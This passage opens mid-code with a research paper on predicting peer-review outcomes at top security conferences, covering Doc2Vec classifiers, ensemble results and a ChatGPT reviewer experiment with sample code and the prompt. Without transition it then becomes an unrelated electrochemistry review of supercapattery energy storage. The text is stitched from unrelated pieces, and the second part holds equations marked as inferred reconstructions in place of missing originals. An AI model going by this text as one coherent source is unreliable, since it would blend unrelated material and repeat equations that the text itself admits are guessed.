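print(clf.predict(x_new), clf.predict_proba(x_new))
```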
Method: From Preprocessing to Classification
Our proposed methodology comprises three primary stages (see Figure 1):
1. Preprocessing: First, PDF files are converted into textual data, after which anonymization is performed by removing author names and affiliations. Subsequently, the corpus is normalized.
2. Obtaining document embeddings: Then, we turn the normalized corpus into document embeddings (latent-space representations) using a trained Doc2Vec model.
3. Classification: Finally, we use classification algorithms to classify the embeddings. Different algorithms are tested for comparison.
Preprocessing of Collected Data: The collected papers are processed into the proper form to ensure their compatibility with subsequent modeling steps.
- PDF to Text. All collected PDF papers require conversion to plain text for compatibility with NLP models such as Doc2Vec. The tool used for this task is the open-source software PDFMiner [24].
- Text Normalization. Following the conversion of PDF to plain text, we normalize the text to enhance efficiency during Doc2Vec training. The normalization techniques we use in the preprocessing include contraction expansion, lemmatization and stemming, stop-word removal, etc. (a sketch is given after this list). In addition to conventional text-normalization techniques, we employ task-specific methods to process and normalize the corpus. This involves removing extraneous content such as author information, bibliography, and publication-related details from the documents. These techniques ensure that our pipeline is double-blinded, just like the double-blind peer-review process, which differs from previous NLP-based research that often takes the authors into account [41].
Document Embedding: Different methods can be used to generate document embeddings (Section 2). Our choice is to use Doc2Vec for the proposed automatic paper-reviewing pipeline because it is simple yet powerful, unsupervised, and able to improve as the training set grows. To enhance the embedding-generation capability of the Doc2Vec model for computer security papers, a two-phase training approach is employed. In the initial pretraining phase, the model is trained on a comprehensive dataset consisting of both security and non-security computer science papers, utilizing papers from both subsets. Subsequently, in the second phase, the model is fine-tuned exclusively on security papers to enhance its sensitivity to the security domain.
Classification: In our experiments, 14 widely used ML classification algorithms are tested. Our negative sample set in the preprints subset consists of more than 4,000 papers. However, the number of "Big-4"-published papers we could collect in the proceedings subset is not enough, which creates an imbalanced ratio of positive and negative samples. This may significantly affect classification results, because the algorithms all assume a 50/50 ratio of positive and negative samples. If trained on such an imbalanced dataset, the classifiers would learn to lean toward rejection over acceptance. To address the imbalance, we first tried SMOTE (Synthetic Minority Over-sampling Technique) [9] to resample the data; however, the results were not promising. Hence, we decided to discard a randomly selected part of the negative samples selected by heuristic rule 3, to make the number of negative samples equal to the number of positive samples. Finally, we work with 3,984 positive samples (all published "Big-4" papers) and 3,984 negative samples (arXiv preprints selected by the heuristic rules).
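As one concrete rendering of the normalization step, the sketch below applies contraction expansion, stop-word removal, lemmatization, and stemming with NLTK; the contraction map and regex are simplified placeholders for the full pipeline.

```python
import re
import nltk
from nltk.corpus import stopwords
from nltk.stem import PorterStemmer, WordNetLemmatizer

nltk.download("stopwords", quiet=True)
nltk.download("wordnet", quiet=True)

STOP = set(stopwords.words("english"))
CONTRACTIONS = {"don't": "do not", "it's": "it is", "can't": "cannot"}
lemmatizer, stemmer = WordNetLemmatizer(), PorterStemmer()

def normalize(text):
    text = text.lower()
    for short, full in CONTRACTIONS.items():       # contraction expansion
        text = text.replace(short, full)
    tokens = re.findall(r"[a-z]+", text)           # keep alphabetic tokens only
    tokens = [t for t in tokens if t not in STOP]  # stop-word removal
    return [stemmer.stem(lemmatizer.lemmatize(t)) for t in tokens]

print(normalize("We don't believe the attacker's model is realistic."))
```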
ChatGPT-based method
We limit the testing data for the ChatGPT experiment to papers published after September 2021, aligning with the training data and knowledge cutoff date of ChatGPT 3.5. Since ChatGPT possesses information regarding review outcomes for papers preceding this date, we focus on data from after September 2021 to make ChatGPT predict unseen papers rather than reiterate its existing knowledge. Specifically, we query ChatGPT through the OpenAI API, providing either the full paper text or only the abstract, and prompt it to predict whether the paper would be accepted or rejected; a sketch of this query follows.
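The sketch below shows the shape of such a query using the legacy openai v0.x Python bindings available at the time of our experiments; the prompt wording and truncation length are illustrative, not our exact prompt.

```python
import openai

openai.api_key = "sk-..."  # placeholder key

def predict_decision(paper_text):
    """Ask ChatGPT for a one-word review decision on a paper."""
    resp = openai.ChatCompletion.create(
        model="gpt-3.5-turbo",
        temperature=0,
        messages=[
            {"role": "system",
             "content": "You act as a reviewer for a top-tier computer "
                        "security conference."},
            {"role": "user",
             "content": "Answer with exactly one word, Accept or Reject, "
                        "for the following submission:\n\n"
                        + paper_text[:8000]},  # crude guard for the 4K-token limit
        ],
    )
    return resp["choices"][0]["message"]["content"].strip()
```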
Experimental Evaluation
We conduct experiments to evaluate the predictive performance of the proposed method and report the results for ChatGPT.
Experimental Results
As a baseline for comparison, we assume an oracle that randomly determines whether a paper will be accepted or rejected, without bias. The probability that this oracle gives a correct prediction is therefore always 50%. We compare various ML models to this Random Guess baseline. We tested 14 different classification algorithms, as well as two model-ensemble methods, Voting and Stacking. The final classification results for each algorithm are shown in Table 2. Among all the classifiers, the average accuracy on testing data is 85.56% and the median accuracy is 88.14%. The average and median F1 scores are 0.8492 and 0.8809, respectively. Moreover, most classification algorithms finish training and testing within half a minute. In fact, the inference time of all these models is almost negligible, because most of the time is spent on training.
Results of Model Ensemble
Model ensembling is a method that uses a set of ML models to obtain better predictive performance than any single learning model alone [26,27]. By doing so, the final model can "learn from each member's strengths", integrate the learning capabilities of each model, and improve the generalization ability of the ensemble. The selection of models follows the principle of diversity and performance to ensure high robustness and high accuracy of the ensemble model. The final estimator we used in the "Stacking" strategy is a decision tree classifier (a sketch of both strategies follows). The model-ensemble results are shown in the "Voting Classifier" and "Stacking Classifier" rows of Table 2. According to the results, both ensemble models' accuracy and F1 score are higher than 0.85. In particular, the "Voting" strategy achieves 0.91, which is similar to the best results among all the classification algorithms we test. Theoretically, an ensemble model is usually more robust than a single classifier, so in the following discussions we will use the "Voting" strategy classifier as the representative of the experimental results. Generally, the obtained accuracy and F1 scores per model are rather close to each other, indicating that the false-negative and false-positive rates are similar.
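Both strategies map directly onto scikit-learn; the member models below are a plausible diverse subset rather than our exact configuration, while the decision-tree final estimator matches the stacking setup described above.

```python
from sklearn.ensemble import StackingClassifier, VotingClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier

# Diverse member models; soft voting averages their predicted probabilities.
members = [
    ("svm", SVC(kernel="linear", probability=True)),
    ("lr", LogisticRegression(max_iter=1000)),
    ("nb", GaussianNB()),
]

voting = VotingClassifier(estimators=members, voting="soft")
stacking = StackingClassifier(estimators=members,
                              final_estimator=DecisionTreeClassifier())
# Both expose the usual API: voting.fit(X_train, y_train); voting.predict(X_test)
```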
Using Abstracts for the Prediction
One interesting idea worth exploring further is the accuracy of using only a paper's abstract for prediction. To explore this question, we extract the Abstract section from raw papers and then use a Doc2Vec model trained on paper abstracts to convert them to high-dimensional embeddings. Specifically, we look for the text between the "Abstract" and "Introduction" sections; if these two sections cannot be located, we use the first 2,000 characters of the document to represent the abstract as a remedy (a sketch of this heuristic follows below). The extracted abstract is normalized and then used for training and testing. The experimental result of the abstract-only prediction is shown in the "Voting on Abstract" row of Table 2. The accuracy and F1 score we get using the "Voting" classifier are 83.06% and 0.8303, respectively. Compared to whole-paper prediction, performance degrades when we predict the result relying merely on the abstract, which is consistent with our intuition. In general, an abstract conveys a paper's core idea, methodology, experimental results (e. g., whether it achieves SOTA performance), etc. from a high level. That is to say, the abstract is a good indicator of the corresponding paper's applicability and scientific contribution, which are usually among the criteria used to determine whether a paper should be accepted or rejected. Although there is a performance loss, the accuracy is still much better than the Random Guess baseline. In addition, it is worth noting that using abstracts alone to predict the result is much faster than using the whole paper.
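The abstract-extraction heuristic mentioned above can be sketched as follows; the regex is a simplified stand-in for our section-locating logic.

```python
import re

def extract_abstract(text):
    """Return the text between 'Abstract' and 'Introduction', else a prefix."""
    m = re.search(r"abstract(.*?)introduction", text, re.IGNORECASE | re.DOTALL)
    if m:
        return m.group(1).strip()
    return text[:2000]  # fallback: first 2,000 characters

print(extract_abstract("Abstract We predict review outcomes. 1 Introduction ..."))
```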
Results of ChatGPT
Table 3: ChatGPT results. The "Answer" column represents the appropriate responses obtained; the "Accept" and "Reject" columns indicate the counts of Accept and Reject predictions generated by ChatGPT, respectively.
We performed experiments using the OpenAI API to assess ChatGPT's performance. Two types of inputs were tested: the full text of the paper and only the abstract. Throughout the experiments, we encountered instances where our requests did not receive a response from the OpenAI system due to internal errors, as well as cases where ChatGPT's replies did not align with our prompts. We filtered out these erroneous answers and focused solely on the appropriate responses. The experimental results, presented in Table 3, indicate that the accuracy of ChatGPT as a reviewer is only comparable to random guessing, irrespective of the input type. Notably, ChatGPT demonstrated a tendency to predict "Accept" for all papers. We discuss these findings further in the subsequent discussion section.
Discussion
In this section, we discuss our experimental results, insights into predicting peer review outcomes, and the broader implications of employing AI methods in the peer-review process.
Discussion of Experimental Results
Algorithmic Fit. As shown in Section 5, 12 of the 14 classification algorithms we tested achieve testing accuracy higher than 80%, and the two ensemble models both exceed 85%. In contrast, ChatGPT only achieves an accuracy of approximately 50%. These results demonstrate the basic effectiveness of the Doc2Vec method. More specifically, SVM-based methods (with different kernel functions) all achieve high accuracy with a relatively reasonable amount of training and testing time. Notably, the SVM with a linear kernel demonstrates the highest accuracy and F1 score.
Naive Rejecter. We note that the accuracy results on the submissions subset are mostly between 80% and 90%. Consider a naive classification algorithm, the "rejecter", which simply rejects every paper submitted to the "Big-4" conferences. Due to the low overall acceptance rate of approximately 20% at these conferences, the rejecter can achieve a similar accuracy of around 80%. However, this rejecter's high accuracy is irrelevant to our objective of exploring the predictability of the reviewing process at security conferences. Furthermore, the rejecter's performance does not undermine our experimental results and analysis. Firstly, we intentionally constructed a balanced dataset to ensure that the classification algorithms have no prior knowledge of the acceptance rate, allowing them to evaluate each paper solely based on its content. Secondly, we thoroughly examined the prediction results (confusion matrices) of each classifier and found that they do not exhibit a bias towards accepting or rejecting papers; ChatGPT's tendency is discussed separately. Notably, most classifiers had a smaller number of False Negatives (FN) than False Positives (FP), though in general the FP and FN rates were similar.
Impact of Novelty. A common concern about ML-supported scholarly review is that algorithms are not able to measure the novelty of a paper, or at least not as well as domain experts. This worry is legitimate because all existing automatic review models, including ours, are trained on historical data, which inherently leads to model failure when dealing with unseen novel papers. In an attempt to test the ability of our method on the novelty aspect of papers, we design an experiment that excludes recent years (2019-now) of "Big-4" security papers from our training dataset. Measuring the impact of novelty directly is intractable. The assumption and intuition behind our design is that, as the security community advances year by year, the distribution gap between newly published papers and the historical papers used for training becomes larger. For example, if $\Gamma_{\rm year}$ denotes the distribution of papers from a particular year and $\Gamma_{\rm training}$ the distribution of all papers in the training set, then $\Gamma_{2022} - \Gamma_{\rm training} > \Gamma_{2019} - \Gamma_{\rm training}$. Papers with greater novelty presumably exhibit a larger gap with respect to historical papers. Therefore, if our method is bad at predicting papers with a larger gap, it will not be good at predicting novel papers.
We tested this hypothesis in our experiments and obtained the following mean accuracy values for each year's "Big-4" conferences: 90.2% (2019), 90.3% (2020), 88.2% (2021), and 86.8% (2022). The results demonstrate a (non-strict) declining tendency. Based on this tendency and general intuition, we presume that the novelty of a paper exerts a weak negative influence on the classifier, making a novel paper more likely to be rejected, which is the opposite of what we want from the review process. Hence, the novelty aspect of a paper should be countered by a dedicated human-in-the-loop rating or general consideration.
Limitations. Beyond the weaknesses in dealing with novelty discussed above, we identified two limitations, both of which could bias results toward higher accuracy. First, the papers we collect for training and testing are not real "Big-4" submissions, which makes prediction easier than in the real scenario: the distribution of published "Big-4" papers differs from the distribution of selected arXiv preprint papers, whereas in the real-world "Big-4" reviewing process the submitted papers are more similar to each other, making outcomes harder to predict. Second, our text-normalization strategies, especially anonymization and removal of publication information, are rather simple heuristics that may not cover all cases. Therefore, we cannot rule out that some classifiers learn to exploit such corner cases during training.
ChatGPT Results. While ChatGPT is a highly advanced language model, it is primarily designed as a general-purpose chatbot and not specifically trained for reviewing papers. Several potential explanations can be considered to account for its poor performance:
1) Lack of domain-specific knowledge: ChatGPT's training is based on a diverse range of internet text, limiting its knowledge of the specific research domains necessary for proficient paper reviewing. Reviewing papers often requires expertise and understanding of the research landscape within a specific field or subject that ChatGPT may not possess to the same extent.
2) Inherent bias: One potential factor contributing to the observed pattern of significantly more Accept than Reject predictions by ChatGPT could be a bias in its response generation. ChatGPT is programmed to adopt a positive and polite attitude, which may influence its tendency to favor Accept predictions over Reject predictions.
3) Lack of in-depth contextual understanding: While ChatGPT can generate coherent responses based on the input it receives, it may not fully grasp the nuances and subtleties involved in security papers. Reviewing papers requires a deep understanding of research methodology, experimental design, and statistical analysis, which may be beyond the scope of ChatGPT's capabilities.
4) Forgetting: ChatGPT's working memory is notably constrained, leading to a limited capacity for retaining detailed information and contextual understanding within lengthy academic texts.
5) Hallucination: One notable limitation of ChatGPT is its tendency to generate outputs that may sound plausible but lack a genuine understanding of the input. This phenomenon, known as hallucination, poses a significant drawback to the reliability of ChatGPT's responses. We observed instances of hallucination when we noticed inconsistent predictions from ChatGPT for the same paper, with conflicting recommendations for acceptance and rejection.
6) Token limitation: ChatGPT 3.5 is constrained by a token limit of 4K, necessitating the segmentation of complete paper texts into smaller chunks. While researchers have proposed transformers with extended token capacities [7], ChatGPT has not yet incorporated these advancements.
In contrast to the proposed methods, ChatGPT possesses an advantage in its ability to provide explanations for the acceptance or rejection of papers. However, these explanations may also be subject to hallucination and lack a true understanding of the underlying reasons.
AI and Peer Review
Academic communities rely on peer review to decide on the acceptance of newly written papers and to provide useful suggestions for improving research works. In practicing it, researchers have also recognized the pros and cons of such systems [31,34,6,30]. In this section, we discuss the current review system, possible improvements to it, and how ML methods could be used to improve it.
Peer Review - An Imperfect Working System. As Soneji et al. concluded in their paper [31], the current peer-review system is "flawed, but we don't have a better system". Reviewers, just like any other human beings, can be affected by non-academic factors when making decisions, not to mention that different reviewers can reach totally different, yet still well-justified, judgments on the same paper. It is natural for researchers to be curious about the consistency of the peer-review process. To the best of our knowledge, this kind of study has yet to be done in the cyber-security community. There is, however, the famous "NIPS experiment" by Cortes and Lawrence in the ML community, who had 1/10th of the papers submitted to NIPS 2014 pass through the review process twice, independently, in order to analyze the review outcomes [11]. They found a consistency of the NIPS 2014 review process of just 25.9%, and only 43% of papers accepted to the conference would be accepted again if the conference review process were repeated [37]. The result is so interesting that many researchers commented and participated in discussions [19]. Similar experiments and analyses have been conducted since [4,28,37], with similar results.
Explorations toward a Better Peer-Review System. Researchers are innovators, and they do not stop exploring. The computer science community has made efforts to explore a better peer-review system. OpenReview 7 has emerged as one of the most notable new review systems of the last decade. It was created to promote the open peer-review model in the computer science community, meaning that submitted papers, reviewers' comments, authors' replies, and other materials relating to the review process are openly available online, so that more researchers get access to the traditionally undisclosed review process. It seems that such an open strategy does improve the peer-review system in terms of consistency [37] and also gives researchers the opportunity to analyze the review system to find improvement measures.
The "Big-4" security conferences have not experimented with an open peerreview model. Smaller security conferences occasionally have, an example being ACM WiSec 2016 that experimented making meta reviews of accepted papers publicly available on their website. 8 Although this is not a fully open peer-review paradigm, it can be considered as a step of the cyber-security community in trying to promote a peer-review system toward more openness. We would like to encourage the use of OpenReview in the cyber-security community to explore if we can together make the review process more open. An open peer-review process not only facilitates communication among researchers, but also allows more analysis on review system and better data for the researchers. Involve AI in Peer-Review Systems. The advancements ML and AI have opened up possibilities for tackling complex real-world tasks with more intelligent algorithms. This progress prompts an intriguing and promising exploration of how ML can enhance the peer-review system, not only to alleviate the reviewers' workload but also to improve its overall effectiveness. While it is evident from our experimental results and discussions that no ML or AI model can replace human reviewers' capabilities, there is still potential for ML methods to serve as supplementary or complementary components within the peer-review system. Notably, researchers have been investigating ML novelty detection [25], a task for detecting test data that are different from training data in some aspects. Particularly, Amplayo et al. proposed a network-based approach to detect novelty of scholarly literature [2].
While the detection of novelty, contributions, and other merits may still be at an early stage of development, ML-based tools are already assisting human peer-review processes in various ways. For example, there are established approaches for detecting academic plagiarism [12]. Additionally, reviewers can leverage ML-powered tools like Grammarly and ChatGPT to help with their assessment of writing quality and clarity. With the help of these existing tools, reviewers can focus more on a paper's novelty, contribution, correctness, and prospects, as they need to spend less time worrying about plagiarism and typos. By offering such positive incentives, we believe that AI tools can play a beneficial role in enhancing the peer-review system.
Conclusion
To study the predictability of peer reviews for security papers, we tested the reviewing capabilities of a Doc2Vec-based method and a ChatGPT-based method on top-tier conferences on computer security and privacy. The results demonstrate that the Doc2Vec-based method achieves approximately 90% prediction accuracy, while ChatGPT achieves only 50% accuracy. Thus, while our proposed method can predict the reviewing outcomes of security research papers with reasonable accuracy, the error rate is non-negligible, and utilizing AGI models like ChatGPT for academic review still requires substantial advancements. Despite acknowledging the limitations of our method, we explored AI performance on the cyber-security peer-review task and discussed our findings with regard to the peer-review system. In conclusion, the peer-review system has successfully adapted to numerous challenges over the past decades. We hope our work encourages further research to address the evolving challenges faced by peer review in the AI era.
A Common Peer-Review Process
Peer review is a crucial process at computer science conferences, in which papers submitted to a venue are assessed by other experts or peers. As an indispensable part of the scholarly research cycle, peer review plays a crucial role in publishing and disseminating state-of-the-art research and results. Many security conferences have turned to a more journal-style peer-review process in recent years; the entire review process is depicted in Figure 2. The final decision now includes not only accept and reject, but also revision. Additionally, the number of review cycles per year has increased: CCS and NDSS now have two review cycles per year; USENIX Security has three rolling review cycles, the same number that IEEE S&P has recalibrated to from an earlier per-month review cycle with 12 submission deadlines per year. The review is double-blind across all review stages, meaning the identities of authors and reviewers are hidden from each other. The review happens in multiple rounds; papers that make it past the first round get additional reviewer assignments.
B Prompt of ChatGPT Experiment
Fig. 2: The paradigm of the peer-review process for "top-tier" security conferences. This diagram includes all steps of the post-submission life cycle of a paper. Dashed lines indicate optional procedures. Bold and colored fonts indicate decisions. Different conferences vary in the details but, in general, they all conform to a similar paradigm. For example, "Accept on Shepherd Approval" is similar to "Conditional Accept or Minor Revision". "Early Reject" is essentially similar to "Reject", except that those papers do not reach the second round of review.

We use the following prompt to let ChatGPT act as a reviewer:
You are an experienced and fair reviewer from top cybersecurity conferences (NDSS, IEEE S&P, CCS and USENIX Security). I will give you a paper for you to read and review. Due to the token limitation, I will split the paper content into some chunks and I will let you read the entire paper chunk by chunk. Please only reply with "OK" if the text does not contain "<|end_of_paper|>". Once you receive it, please merge the previous messages together into a full paper for you to review. I want you to decide whether this paper should be accepted or not. You must first tell me your decision with "Accept" or "Reject", and then explain your reasons in concise language.

Table 5 contains the information of the proceedings we collect.
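The paper does not include the driver code for this prompt; the following is a minimal sketch of how the chunked exchange could be automated, assuming Node.js with the official openai client. The chunk size, model name and sentinel handling are illustrative choices, not details from the original experiment.

```javascript
import OpenAI from "openai";

const client = new OpenAI(); // assumes OPENAI_API_KEY is set in the environment

const SYSTEM_PROMPT = "You are an experienced and fair reviewer ..."; // full prompt from above
const CHUNK_SIZE = 12000; // characters per chunk; illustrative, chosen to stay under the token limit

// Split the paper text into fixed-size chunks and append the end-of-paper sentinel.
function toChunks(paperText) {
  const chunks = [];
  for (let i = 0; i < paperText.length; i += CHUNK_SIZE) {
    chunks.push(paperText.slice(i, i + CHUNK_SIZE));
  }
  chunks[chunks.length - 1] += "\n<|end_of_paper|>";
  return chunks;
}

// Feed the paper chunk by chunk, keeping the whole conversation in context,
// then return the final Accept/Reject response. Note that the accumulated
// conversation is itself subject to the model's context limit.
async function reviewPaper(paperText) {
  const messages = [{ role: "system", content: SYSTEM_PROMPT }];
  let reply = "";
  for (const chunk of toChunks(paperText)) {
    messages.push({ role: "user", content: chunk });
    const res = await client.chat.completions.create({
      model: "gpt-3.5-turbo", // the paper uses ChatGPT 3.5
      messages,
    });
    reply = res.choices[0].message.content;
    messages.push({ role: "assistant", content: reply });
  }
  return reply; // expected to start with "Accept" or "Reject"
}
```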
Supercapattery: Merit merge of capacitive and Nernstian charge storage mechanisms
Abstract Supercapattery is the generic name for hybrids of the supercapacitor and the rechargeable battery. Batteries store charge via Faradaic processes, involving the reversible transfer of localised or zone-delocalised valence electrons. The former is governed by the Nernst equation. The latter leads to pseudocapacitance (or Faradaic capacitance), which may be differentiated from electric double layer capacitance with spectroscopic assistance such as electron spin resonance. Because capacitive storage is the basis of supercapacitors, the combination of capacitive and Nernstian mechanisms has dominated supercapattery research since 2018, covering nanostructured and compounded metal oxides and sulphides, water-in-salt and redox-active electrolytes, and bipolar stacks of multiple cells. The technical achievements so far, such as a specific energy of 270 Wh/kg in aqueous electrolyte and charging-discharging for more than 5000 cycles, point to a challenging but promising future for supercapattery.
Challenges to conventional electrochemical energy storage
Replacing fossil fuels with renewables requires energy storage, for which electrochemical energy storage (EES) devices are a desirable fit because of their modular nature, commercial availability and potentially fossil-comparable energy capacity. On the last point, oxidation of lithium in electrochemical cells causes a Gibbs energy change (ΔG°(Li) = 8.56 kWh/kg at 1000 °C) that is comparable to that of coal combustion (9.16 kWh/kg) in internal combustion engines (ICEs) [1]. Representative commercial EES devices include rechargeable batteries (RBs) and supercapacitors (SCs), whilst flow batteries are suitable for stationary and large-scale storage [2][3][4]. Although far better in energy efficiency than ICEs (ca. 20%), EES devices have not yet performed to expectations: the laboratory-tested lithium-air battery (LAB) and the commercial lithium-ion battery (LIB) can only store energy up to 1.0 and 0.3 kWh/kg, respectively, pending further improvement in rate and durability.
Performance-wise, RBs offer higher storage capacity than SCs, which are however better in power capability, energy efficiency, and cycle life. These complementary merits have encouraged the development of several hybrid devices, including lithium-ion capacitors, redox capacitors, and pseudocapacitors [5]. These hybrids store charge differently from a capacitor, but the word capacitor in their names has led to misuse of capacitance as a performance indicator [6]. For unambiguous classification and comparison, the generic name supercapattery (= supercapacitor + battery) was proposed in 2007, followed later by laboratory demonstration [7,8]. In fact, the combination of capacitive and lithium storage electrodes was reported in earlier literature, although the term "lithium-ion capacitor" (LIC) also first appeared in 2007 [9][10][11][12]. Because of their close relation with LIBs, research and development of LICs have progressed fast, along with other ion capacitors [13][14][15]. On the contrary, supercapattery rarely appeared in the literature before 2015. The recent growing interest is partly driven by curiosity and the exploration of new and improved EES mechanisms, materials and devices beyond SCs and RBs [16][17][18]. The other, more fundamental reason is related to pseudocapacitance, which has unfortunately been misused to account for the behaviour of many new transition metal compounds that are capable of Nernstian storage.
Pseudocapacitance explained
All rechargeable EES devices work following one or a combination of electric double layer (EDL) capacitive, pseudocapacitive and battery-like mechanisms [4]. EDL storage is physical, at the electrode/electrolyte interface, whilst the latter two involve charge transfer reactions on the electrode and are hence both Faradaic in nature. Battery-like or Nernstian storage is widely known to result from reversible electrode reactions that are broadly governed by the Nernst equation. It is characterised by peak-shaped cyclic voltammograms (CVs) and by potential plateaux on galvanostatic charging-discharging plots (GCDs). Pseudocapacitance (or Faradaic capacitance) presents the same features as EDL capacitance, namely rectangular CVs and linear GCDs. A hypothesis explains these differences by the transfer of localised versus partially or zone-delocalised valence electrons, leading to Nernstian and pseudocapacitive responses, respectively [19]. It agrees with density functional theory modelling of oxygen-doped graphenes [20,21]. According to the band model [22], localised valence electrons have a fixed electronic energy level, corresponding to a fixed potential for their transfer. This in turn leads to the peak-shaped CVs and plateau-featured GCDs of Nernstian storage. For zone-delocalised valence electrons, as in semiconductors (instead of full delocalisation as in metals and perfect monolayer graphene), their very close electronic energy levels merge into a sufficiently wide band, into or from which electron transfer occurs over a continuous range of potentials. This hypothesis accounts well for the rectangular CVs and linear GCDs of pseudocapacitive storage.
Although the electrochemical characteristics of pseudocapacitance and EDL capacitance are recognised to be the same [4,6,[23][24][25], some authors have claimed to differentiate between the two by fitting CV data against equation (11) or (12) below [26][27][28], where i and v are the current and potential scan rate of the CV, respectively, and a, b, m and n are constants. For surface-confined processes, b = 0 and n = 1, but under diffusion control, a = 0 and n = 1/2. Otherwise, the electrode reaction is under mixed control. It was assumed, incorrectly, that the EDL currents resulted from surface-confined changes and hence were proportional to v, whilst Faradaic contributions were diffusion controlled, showing a linear dependence of i on v^(1/2). Obviously, these assumptions contradict the basic knowledge that surface-confined processes, either capacitive or Nernstian, dominate the behaviour of relatively thin electrode coatings. Also, diffusion control can occur in relatively thick electrode coatings, into or from which transport of ions is necessary to maintain charge neutrality, for both capacitive and Nernstian processes.
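The display forms of equations (11) and (12) did not survive in this text. A reconstruction that is consistent with the limiting cases stated above (surface-confined: b = 0, n = 1; diffusion-controlled: a = 0, n = 1/2) is the following; it should be read as an inferred restoration rather than a verbatim copy of the original:

```latex
i = a\,v + b\,v^{1/2} \tag{11}
i = m\,v^{n} \tag{12}
```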
In fact, a Faradaic process, either Nernstian or capacitive, always unpairs or pairs electrons in atomic or molecular orbitals, which in turn generates or demolishes spins that can be monitored by electron spin resonance (ESR) spectroscopy [29,30]. Fig. 1a shows the CVs of polyaniline (PAn). Whilst the three peak couples (A1/C1, A2/C2 and A3/C3) are well explained elsewhere [33,34], capacitive responses are evident between 0.1 and 0.5 V. For comparison, Fig. 1b presents a typical cyclic esrogram of PAn between -0.2 and 0.5 V [30]. It can be seen that the ESR signal varied similarly to the currents on the CVs between 0.1 and 0.5 V, which is strong evidence of Faradaic dis-/charging with insignificant EDL contribution, if any. Note that A1 on the esrogram is at a more positive potential than A1 on the CVs. This difference arises because the ESR signal is proportional to the amount of charge passed, rather than to the rate of charge flow, i.e. the current.
Basics of supercapattery and early development
Aiming at merging the merits of SCs and RBs [4,5,18,24], supercapattery engages both capacitive and Faradaic mechanisms [18,46]. Because capacitive storage can be EDL or pseudocapacitive, and Faradaic storage can be pseudocapacitive or Nernstian, there is a large number of combination options.
Supercapattery behaviour can result from materials such as heat-treated nickel hydroxide films, which exhibited fairly rectangular CVs from 0 to 0.35 V vs. SCE but presented large current peaks at more positive potentials in aqueous KOH [47]. Composites of manganese oxides (MnOx, 1.5 < x ≤ 2) with carbon nanotubes (CNTs) or graphenes can also store charge via mixed mechanisms [48][49][50]. Further, coupling electron transfer reactions of soluble species, such as iodide ions, with the EDL capacitance of a porous carbon electrode is another effective way to combine capacitive and Nernstian mechanisms [24,[52][53][54].
The device approach to supercapattery considers the relations between the two electrodes. Firstly, the charges passing through the capacitive (Qcap) and Nernstian (Qbat) electrodes must be equal, as expressed by equation (13) [4], where Qsp is the specific charge and Csp the specific capacitance.
Equation (14) is useful for designing a supercapattery, regardless of whether the capacitive or Nernstian electrode is the positrode or the negatrode.
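Equations (13) and (14) are likewise missing from this text. A plausible reconstruction, assuming the charge-balance form commonly used for designing hybrid cells (here mcap and mbat denote the active masses of the two electrodes and ΔEcap the operating potential window of the capacitive electrode; these symbols are introduced for illustration only):

```latex
Q = C_{sp,cap}\, m_{cap}\, \Delta E_{cap} = Q_{sp,bat}\, m_{bat} \tag{13}
\frac{m_{cap}}{m_{bat}} = \frac{Q_{sp,bat}}{C_{sp,cap}\,\Delta E_{cap}} \tag{14}
```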
Secondly, equal currents flow through both electrodes at any time. For reversible storage in thin films, equation (15) governs this relation, linking with the Nernst equation (16), E = E° + (RT/zF) ln(cO/cR), for reduction (charging on the positrode, or discharging on the negatrode) [4], where the governing quantity is the amount of the relevant (or all) redox species in the thin film. Equations (15) and (16) were used to calculate the GCD plots in Fig. 2a.

For example, hydrothermally doping 40% sulfur into FeCo2O4 produced nanocaterpillars and increased the capacitance at 2 A/g from 779 F/g without doping to 1801 F/g. The CVs and GCDs were fairly capacitive, but the capacitive potentials ranged only from 0 to 0.5 V vs. Ag/AgCl. Supercapatteries made from an undoped FeCo2O4 negatrode and the sulfur-doped positrode performed very well in aqueous 3 mol/L KOH. The cell voltage was 1.45 V, achieving specific energy and power of 140 Wh/kg and 1434 W/kg, respectively, over more than 5000 dis-/charging cycles [16]. However, the CVs and GCDs of the supercapattery showed clear resistive distortion, indicating a higher resistance of the undoped negatrode. Also, the energy efficiency estimated from the GCD at 2 A/g was lower than 60%.
Nanosheets of MoS2 were hydrothermally grown in the pores of a carbon nitride template [17]. In aqueous 1 mol/L KOH, the composite showed Nernstian CVs and GCDs from 0.0 V to 0.5 V, and the specific charge capacity reached over 500 C/g. Surprisingly, a symmetrical supercapattery was built from this material, leading to questionable tests and results.
An interesting Nernstian positrode was made from nanosheets of carbon-coated Li3V2(PO4)3 [45]. Li3V2(PO4)3 offers three valence states of V (III, IV and V), corresponding to the storage of three Li+ ions per formula unit at high positive potentials, > 3.8 V vs. Li/Li+. With an activated carbon negatrode in mixed organic carbonates, the supercapattery was tested to 2.7 V to ensure reversible lithium storage in Li3V2(PO4)3/C. The cell GCDs presented two shoulders, reflecting two steps of lithium storage. The reported specific energy and power were 53 Wh/kg and 3 kW/kg, respectively. However, after 2000 cycles, the capacity loss reached 35%, apparently because repeated lithium-ion insertion and removal caused microscopic fatigue damage in the positrode.
Carbon negatrodes are often chosen for aqueous electrolytes because they impose high overpotentials on hydrogen evolution. Further, the nano-pores of activated carbon permit proton or water reduction to adsorbed hydrogen atoms or molecules, but restrict their nucleation and growth into bubbles. These adsorbed hydrogen species can also be re-oxidised and hence increase the charge storage capacity [57,58].
More desirable negatrodes are based on active metals because of their very negative redox potentials and reversible electrode reactions [13-15,55,56]. The concern about dendritic deposition upon cycling is addressed by several approaches, such as pulsed charging for both zinc and lithium deposition [59,60] and the use of 3D-structured (porous) current collectors (e.g. copper foam) for lithium deposition [61,62].
